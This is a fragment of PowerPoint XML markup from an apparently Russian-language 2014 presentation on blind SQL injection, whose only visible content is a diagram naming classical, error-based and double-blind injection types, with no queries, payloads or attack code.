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1" r:id="rId3"/>
    <p:sldId id="268" r:id="rId4"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="266" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="278" r:id="rId16"/>
    <p:sldId id="280" r:id="rId17"/>
    <p:sldId id="279" r:id="rId18"/>
    <p:sldId id="262" r:id="rId1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434" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1"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1828800" cy="18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4CFF02-87E5-4EC6-83AE-A59BD237CBF8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E8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}">
      <dgm:prSet phldrT="[Текст]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Blind SQL Injection</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C62AABA8-A5B1-4BDE-906A-9548676BA2EA}" type="parTrans" cxnId="{B5771ACD-0A1F-4839-B22E-76C77D344780}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="ru-RU"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6159A2F6-D0EE-43DE-A1C7-58C15476F018}" type="sibTrans" cxnId="{B5771ACD-0A1F-4839-B22E-76C77D344780}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="ru-RU"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11FAE6B9-5073-45A3-8FEB-6B2945DBE39E}" type="asst">
      <dgm:prSet phldrT="[Текст]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Classical Injection</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46BB18C9-77E1-4391-938A-3303F75BA3BD}" type="parTrans" cxnId="{C781D726-C6C4-4A74-A217-CF3438F85E9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="ru-RU"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E5E39BE-8C0D-40D8-9CB5-94E236922107}" type="sibTrans" cxnId="{C781D726-C6C4-4A74-A217-CF3438F85E9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="ru-RU"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E80E85D1-BD84-4797-B2FD-E838FD10C287}" type="asst">
      <dgm:prSet phldrT="[Текст]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Error Based Injection</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA035AE2-617C-48B7-A891-DCF228185A28}" type="parTrans" cxnId="{CD74EAC8-6C7E-41F9-9095-B969B55D21CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="ru-RU"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CE4360E-099B-4949-A0D7-6847AB7D00DB}" type="sibTrans" cxnId="{CD74EAC8-6C7E-41F9-9095-B969B55D21CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="ru-RU"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1055E7F8-707C-46AF-8407-E63830CF3960}" type="asst">
      <dgm:prSet phldrT="[Текст]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Double Blind </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>Ijection</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8BD972E6-C062-469F-8EE9-075EC6CD3C76}" type="parTrans" cxnId="{3EC9735F-BDF4-4E2A-8640-A0BCA4731AEB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="ru-RU"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2BCB34A-51B2-4ED3-8B3B-C0E36D3A1AC0}" type="sibTrans" cxnId="{3EC9735F-BDF4-4E2A-8640-A0BCA4731AEB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="ru-RU"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4CB4DA2-B974-4582-91F9-34543806DFCE}" type="pres">
      <dgm:prSet presAssocID="{2C4CFF02-87E5-4EC6-83AE-A59BD237CBF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385F48C-8788-4187-AC5B-2E62A1FB9FD8}" type="pres">
      <dgm:prSet presAssocID="{CE8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}" presName="root1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{168915C5-9210-4EB9-B031-A6CFB3704B0A}" type="pres">
      <dgm:prSet presAssocID="{CE8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}" presName="LevelOneTextNode" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1" custScaleY="1034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4839A61-01A3-452F-AE1A-E1FE281073A4}" type="pres">
      <dgm:prSet presAssocID="{CE8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}" presName="level2hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5567470D-E2EA-4330-8242-AEF5001B11E2}" type="pres">
      <dgm:prSet presAssocID="{46BB18C9-77E1-4391-938A-3303F75BA3BD}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2222FE0F-94A2-4CB9-BC0C-B79FB6BEE58F}" type="pres">
      <dgm:prSet presAssocID="{46BB18C9-77E1-4391-938A-3303F75BA3BD}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24506EAE-B0FF-4193-9F9D-69B011EADD93}" type="pres">
      <dgm:prSet presAssocID="{11FAE6B9-5073-45A3-8FEB-6B2945DBE39E}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3114C997-E86F-453A-89C9-181EC7D0567A}" type="pres">
      <dgm:prSet presAssocID="{11FAE6B9-5073-45A3-8FEB-6B2945DBE39E}" presName="LevelTwoTextNode" presStyleLbl="asst1" presStyleIdx="0" presStyleCnt="3" custScaleX="1457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8832719-5F02-4FBE-8533-56904ECA6113}" type="pres">
      <dgm:prSet presAssocID="{11FAE6B9-5073-45A3-8FEB-6B2945DBE39E}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{657370DE-FFF6-464C-9384-8A8169D03864}" type="pres">
      <dgm:prSet presAssocID="{FA035AE2-617C-48B7-A891-DCF228185A28}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FDC0ED5-EBC7-4438-9C69-E6DC91F89AAE}" type="pres">
      <dgm:prSet presAssocID="{FA035AE2-617C-48B7-A891-DCF228185A28}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0D04D2CC-72C6-40FA-92CC-65A169D3EC72}" type="pres">
      <dgm:prSet presAssocID="{E80E85D1-BD84-4797-B2FD-E838FD10C287}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ABD9FFDF-F6F3-458C-A0B7-21EAA90E0EEF}" type="pres">
      <dgm:prSet presAssocID="{E80E85D1-BD84-4797-B2FD-E838FD10C287}" presName="LevelTwoTextNode" presStyleLbl="asst1" presStyleIdx="1" presStyleCnt="3" custScaleX="1457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5809D4B-8FF8-428B-B1A6-05ABCE8AE694}" type="pres">
      <dgm:prSet presAssocID="{E80E85D1-BD84-4797-B2FD-E838FD10C287}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB9782C2-C00B-4E46-900C-82EBBA0F166E}" type="pres">
      <dgm:prSet presAssocID="{8BD972E6-C062-469F-8EE9-075EC6CD3C76}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A17A92A5-CA11-4365-ABB8-7EA93AA38A4D}" type="pres">
      <dgm:prSet presAssocID="{8BD972E6-C062-469F-8EE9-075EC6CD3C76}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{48D589B9-F380-4AEF-947B-F786A54038EC}" type="pres">
      <dgm:prSet presAssocID="{1055E7F8-707C-46AF-8407-E63830CF3960}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{106F30C5-B886-4EA7-B67A-9057CBCA141F}" type="pres">
      <dgm:prSet presAssocID="{1055E7F8-707C-46AF-8407-E63830CF3960}" presName="LevelTwoTextNode" presStyleLbl="asst1" presStyleIdx="2" presStyleCnt="3" custScaleX="1457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93BE799-8086-42FA-93C3-904C95926E32}" type="pres">
      <dgm:prSet presAssocID="{1055E7F8-707C-46AF-8407-E63830CF3960}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{3EC9735F-BDF4-4E2A-8640-A0BCA4731AEB}" srcId="{CE8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}" destId="{1055E7F8-707C-46AF-8407-E63830CF3960}" srcOrd="2" destOrd="0" parTransId="{8BD972E6-C062-469F-8EE9-075EC6CD3C76}" sibTransId="{A2BCB34A-51B2-4ED3-8B3B-C0E36D3A1AC0}"/>
    <dgm:cxn modelId="{4425340B-06B7-444E-8C25-CE052F8611A2}" type="presOf" srcId="{CE8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}" destId="{168915C5-9210-4EB9-B031-A6CFB3704B0A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{5BB33865-6886-44D1-A753-1AEF3E11B49D}" type="presOf" srcId="{11FAE6B9-5073-45A3-8FEB-6B2945DBE39E}" destId="{3114C997-E86F-453A-89C9-181EC7D0567A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{C9298CB1-30C6-4BD4-B466-F9D17F44EDD8}" type="presOf" srcId="{46BB18C9-77E1-4391-938A-3303F75BA3BD}" destId="{5567470D-E2EA-4330-8242-AEF5001B11E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{4127CA0A-827B-442E-91AB-87F12DE6C4EB}" type="presOf" srcId="{1055E7F8-707C-46AF-8407-E63830CF3960}" destId="{106F30C5-B886-4EA7-B67A-9057CBCA141F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{0AEA3B41-F1C2-44EA-AC7D-C389534F636E}" type="presOf" srcId="{FA035AE2-617C-48B7-A891-DCF228185A28}" destId="{657370DE-FFF6-464C-9384-8A8169D03864}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{CD74EAC8-6C7E-41F9-9095-B969B55D21CC}" srcId="{CE8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}" destId="{E80E85D1-BD84-4797-B2FD-E838FD10C287}" srcOrd="1" destOrd="0" parTransId="{FA035AE2-617C-48B7-A891-DCF228185A28}" sibTransId="{8CE4360E-099B-4949-A0D7-6847AB7D00DB}"/>
    <dgm:cxn modelId="{626F6333-3538-4A53-BF46-695B0DC4CC30}" type="presOf" srcId="{E80E85D1-BD84-4797-B2FD-E838FD10C287}" destId="{ABD9FFDF-F6F3-458C-A0B7-21EAA90E0EEF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{71C0985A-7868-47BD-A0F3-A712FCD7C0DD}" type="presOf" srcId="{8BD972E6-C062-469F-8EE9-075EC6CD3C76}" destId="{A17A92A5-CA11-4365-ABB8-7EA93AA38A4D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{C781D726-C6C4-4A74-A217-CF3438F85E9F}" srcId="{CE8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}" destId="{11FAE6B9-5073-45A3-8FEB-6B2945DBE39E}" srcOrd="0" destOrd="0" parTransId="{46BB18C9-77E1-4391-938A-3303F75BA3BD}" sibTransId="{3E5E39BE-8C0D-40D8-9CB5-94E236922107}"/>
    <dgm:cxn modelId="{B5771ACD-0A1F-4839-B22E-76C77D344780}" srcId="{2C4CFF02-87E5-4EC6-83AE-A59BD237CBF8}" destId="{CE8EE07B-F58C-4DFC-8AB1-9E59EC6CB81C}" srcOrd="0" destOrd="0" parTransId="{C62AABA8-A5B1-4BDE-906A-9548676BA2EA}" sibTransId="{6159A2F6-D0EE-43DE-A1C7-58C15476F018}"/>
    <dgm:cxn modelId="{96B5929D-3E30-4254-B9CF-96A9169682C4}" type="presOf" srcId="{8BD972E6-C062-469F-8EE9-075EC6CD3C76}" destId="{FB9782C2-C00B-4E46-900C-82EBBA0F166E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{9C241C4C-6DAC-4E07-A597-03BF0A2F28FF}" type="presOf" srcId="{46BB18C9-77E1-4391-938A-3303F75BA3BD}" destId="{2222FE0F-94A2-4CB9-BC0C-B79FB6BEE58F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{FF5FB3E9-3851-436D-85D1-425CF3EBAD63}" type="presOf" srcId="{FA035AE2-617C-48B7-A891-DCF228185A28}" destId="{3FDC0ED5-EBC7-4438-9C69-E6DC91F89AAE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{E1150302-7B83-44BA-8178-C098B3AF306C}" type="presOf" srcId="{2C4CFF02-87E5-4EC6-83AE-A59BD237CBF8}" destId="{D4CB4DA2-B974-4582-91F9-34543806DFCE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{A6219FF0-6E74-429F-8649-3C12532F0F91}" type="presParOf" srcId="{D4CB4DA2-B974-4582-91F9-34543806DFCE}" destId="{3385F48C-8788-4187-AC5B-2E62A1FB9FD8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{3ADD5EDF-0BD8-49AC-98ED-049F54C45113}" type="presParOf" srcId="{3385F48C-8788-4187-AC5B-2E62A1FB9FD8}" destId="{168915C5-9210-4EB9-B031-A6CFB3704B0A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{2CE29488-078A-406A-84C4-4D7614D62D16}" type="presParOf" srcId="{3385F48C-8788-4187-AC5B-2E62A1FB9FD8}" destId="{34839A61-01A3-452F-AE1A-E1FE281073A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{E65B7512-6F72-4733-8023-32CB68E08481}" type="presParOf" srcId="{34839A61-01A3-452F-AE1A-E1FE281073A4}" destId="{5567470D-E2EA-4330-8242-AEF5001B11E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{0D90325B-0420-4A64-AA3B-66FD112BEA1A}" type="presParOf" srcId="{5567470D-E2EA-4330-8242-AEF5001B11E2}" destId="{2222FE0F-94A2-4CB9-BC0C-B79FB6BEE58F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{79A59D42-A95D-4CC2-9228-645ECB73B24A}" type="presParOf" srcId="{34839A61-01A3-452F-AE1A-E1FE281073A4}" destId="{24506EAE-B0FF-4193-9F9D-69B011EADD93}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{C03F0D0E-A548-4E3E-8836-63A8E293F487}" type="presParOf" srcId="{24506EAE-B0FF-4193-9F9D-69B011EADD93}" destId="{3114C997-E86F-453A-89C9-181EC7D0567A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{6860A3D4-1533-4444-BA8E-1814FE21181A}" type="presParOf" srcId="{24506EAE-B0FF-4193-9F9D-69B011EADD93}" destId="{28832719-5F02-4FBE-8533-56904ECA6113}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{95811BEF-A16D-4EC5-8125-52BD9A354409}" type="presParOf" srcId="{34839A61-01A3-452F-AE1A-E1FE281073A4}" destId="{657370DE-FFF6-464C-9384-8A8169D03864}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{200E0170-358B-4508-ABAB-FF06B3A081E8}" type="presParOf" srcId="{657370DE-FFF6-464C-9384-8A8169D03864}" destId="{3FDC0ED5-EBC7-4438-9C69-E6DC91F89AAE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{7ACB2E7E-05EF-4DC6-9088-6F9E38866508}" type="presParOf" srcId="{34839A61-01A3-452F-AE1A-E1FE281073A4}" destId="{0D04D2CC-72C6-40FA-92CC-65A169D3EC72}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{4096AF11-BFAF-4E2F-A451-E59E28DA3DA6}" type="presParOf" srcId="{0D04D2CC-72C6-40FA-92CC-65A169D3EC72}" destId="{ABD9FFDF-F6F3-458C-A0B7-21EAA90E0EEF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{5B827BBE-8BB5-4A79-B49C-8271EBCB9C11}" type="presParOf" srcId="{0D04D2CC-72C6-40FA-92CC-65A169D3EC72}" destId="{75809D4B-8FF8-428B-B1A6-05ABCE8AE694}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{2F0CD382-B5D5-4385-8740-E00C49B34995}" type="presParOf" srcId="{34839A61-01A3-452F-AE1A-E1FE281073A4}" destId="{FB9782C2-C00B-4E46-900C-82EBBA0F166E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{A615FFCD-DFAF-4D58-A312-4A7FC9FBDB07}" type="presParOf" srcId="{FB9782C2-C00B-4E46-900C-82EBBA0F166E}" destId="{A17A92A5-CA11-4365-ABB8-7EA93AA38A4D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{E59C8628-08DB-4FEB-830C-19A08E2E6CCC}" type="presParOf" srcId="{34839A61-01A3-452F-AE1A-E1FE281073A4}" destId="{48D589B9-F380-4AEF-947B-F786A54038EC}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{E012EF76-F96A-423C-885D-ED43B22C2DDA}" type="presParOf" srcId="{48D589B9-F380-4AEF-947B-F786A54038EC}" destId="{106F30C5-B886-4EA7-B67A-9057CBCA141F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy"/>
    <dgm:cxn modelId="{4FCC10D4-8533-4C29-B03F-0BFFEAEF45CE}" type="presParOf" srcId="{48D589B9-F380-4AEF-947B-F786A54038EC}" destId="{893BE799-8086-42FA-93C3-904C95926E3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9782C2-C00B-4E46-900C-82EBBA0F166E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="852741" y="2743200"/>
          <a:ext cx="558946" cy="10650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9473" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="279473" y="1065066"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="558946" y="10650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102144" y="3245662"/>
        <a:ext cx="60141" cy="60141"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{657370DE-FFF6-464C-9384-8A8169D03864}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="852741" y="2697480"/>
          <a:ext cx="55894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8946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118241" y="2729226"/>
        <a:ext cx="27947" cy="27947"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5567470D-E2EA-4330-8242-AEF5001B11E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="852741" y="1678133"/>
          <a:ext cx="558946" cy="1065066"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="1065066"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="279473" y="1065066"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="279473" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="55894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102144" y="2180596"/>
        <a:ext cx="60141" cy="60141"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{168915C5-9210-4EB9-B031-A6CFB3704B0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="-1892528" y="2317173"/>
          <a:ext cx="4638486" cy="8520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Blind SQL Injection</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" sz="4100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="-1892528" y="2317173"/>
        <a:ext cx="4638486" cy="852052"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3114C997-E86F-453A-89C9-181EC7D0567A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1411688" y="1252107"/>
          <a:ext cx="4074022" cy="8520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Classical Injection</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" sz="3000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1411688" y="1252107"/>
        <a:ext cx="4074022" cy="852052"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ABD9FFDF-F6F3-458C-A0B7-21EAA90E0EEF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1411688" y="2317173"/>
          <a:ext cx="4074022" cy="8520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Error Based Injection</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" sz="3000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1411688" y="2317173"/>
        <a:ext cx="4074022" cy="852052"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{106F30C5-B886-4EA7-B67A-9057CBCA141F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1411688" y="3382239"/>
          <a:ext cx="4074022" cy="8520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Double Blind </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Ijection</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" sz="3000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1411688" y="3382239"/>
        <a:ext cx="4074022" cy="8520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15C6919B-507F-40C4-8CC1-7FC4312D5960}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>06.08.2014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6EC925D0-9AA2-47FF-9A45-A3590786A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450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3278C01B-CB11-4E26-8EC9-D4A59BAB827F}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>06.08.2014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99DEDEF0-64AD-4998-9B3A-53BD697CCA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105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835144-0FA5-4908-8CCC-ECABA1AEAF15}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU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1567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59179"/>
            <a:ext cx="7772400" cy="1170072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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82653"/>
            <a:ext cx="6400800" cy="673768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subtitle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731963" y="274638"/>
            <a:ext cx="69548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mailto:bondarenko.ihar@yandex.ru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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4419600"/>
            <a:ext cx="7772400" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Слепые </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>инъекции.</a:t>
            </a:r>
